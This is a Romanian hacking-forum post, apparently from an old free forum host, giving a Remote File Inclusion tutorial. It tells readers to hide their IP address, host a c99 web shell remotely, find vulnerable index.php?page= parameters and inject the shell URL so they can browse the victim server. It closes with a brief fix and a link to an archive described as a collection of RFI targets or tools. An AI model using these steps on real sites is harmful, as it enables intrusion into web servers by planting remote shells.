Filehost.ro - gazduire fisiere
welcome here ;)
poti gasi aici o parte din ce am adunat io dealungul timpului. credit la tot ce e pe acest forum : google
Nou pe simpatie:
lonely_32 la Simpatie.ro
Femeie
24 ani
Valcea
cauta Barbat
26 - 57 ani
welcome here ;)ReguliInregistrareLoginPozeNu sunteti logat. Lista Forumurilor Pe Tematici
welcome here ;) / hacking /

metoda rfi ...

Pagini: 1  
#1
filipzeffy
Administrator
Postari: 117
..::RFI - Remote File Inclusion::..
===================================
In primul rand avem nevoie de :
1.Un hide ip - recomand aol. Pentru a vedea daca ip-ul real a fost "inlocuit" folositi http://whatismyip.org/
2.Un site unde sa avem urcat shellul. ( recomand c99 , este mai usor de navigat )
===================================
Aceasta vulnerabilitate afecteaza index.php .
In index.php vulnerabilitate este urmatoarea:
" require($page . “pagina.php”); "
Exemplu:
Avem siteul urmator:
http://test.com/index.php , pentru a gasi "RFI-ul" va trebui sa ne uitam in sursa paginii . Click dreapta - View Page Source , apasam Ctrl+F si cautam ceva de genu : index.php?
Sa zicem ca am gasit index.php?page=2. Pentru a testa daca siteul este vulnerabil vom reforumula link-ul , exemplu : http://test.com/index.php?page=http://s ... ro/c99.txt? - Press Enter
Daca siteul nostru test.com este vulnerabil vom putea naviga prin directoarele dupa server .
====================================
Cum "reparam" aceasta vulnerabilitate ?

Cum am spus si mai sus : in index.php vulnerabilitatea este : require($page. "pagina.php");
Pentru a repara bugul va trebui sa stergem "$page." , exemplu :
require("pagina.php");
=====================================


collection of rfi : http://rapidshare.com/files/78712425/Co ... s.rar.html


 
   
Pagini: 1  
Mergi la